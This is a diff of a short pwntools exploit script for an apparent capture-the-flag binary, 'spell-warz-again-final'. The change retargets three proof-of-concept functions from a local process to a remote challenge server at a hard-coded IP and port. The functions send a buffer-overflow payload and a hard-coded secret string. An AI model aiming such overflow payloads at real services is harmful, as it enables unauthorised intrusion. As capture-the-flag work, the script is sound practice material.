|
@ -1,10 +1,13 @@ |
|
|
from pwn import process |
|
|
|
|
|
|
|
|
from pwn import process, remote |
|
|
|
|
|
|
|
|
FILENAME = "./spell-warz-again-final" |
|
|
FILENAME = "./spell-warz-again-final" |
|
|
|
|
|
|
|
|
|
|
|
def run(): |
|
|
|
|
|
# return process(FILENAME) |
|
|
|
|
|
return remote("103.200.7.150", 60104) |
|
|
|
|
|
|
|
|
def poc0(): |
|
|
def poc0(): |
|
|
p = process(FILENAME) |
|
|
|
|
|
|
|
|
p = run() |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
@ -22,12 +25,12 @@ def poc0(): |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc1(): |
|
|
def poc1(): |
|
|
p = process(FILENAME) |
|
|
|
|
|
|
|
|
p = run() |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("Leo") |
|
|
p.sendline("Leo") |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in range(100): |
|
|
|
|
|
|
|
|
for _ in range(2): |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("3") |
|
|
p.sendline("3") |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
@ -47,7 +50,7 @@ def poc1(): |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc2(): |
|
|
def poc2(): |
|
|
p = process(FILENAME) |
|
|
|
|
|
|
|
|
p = run() |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|
p.sendline("__th3_w0rLd_D3str0Y3r__") |
|
|
p.sendline("__th3_w0rLd_D3str0Y3r__") |
|
|
print p.recvuntil(">") |
|
|
print p.recvuntil(">") |
|
|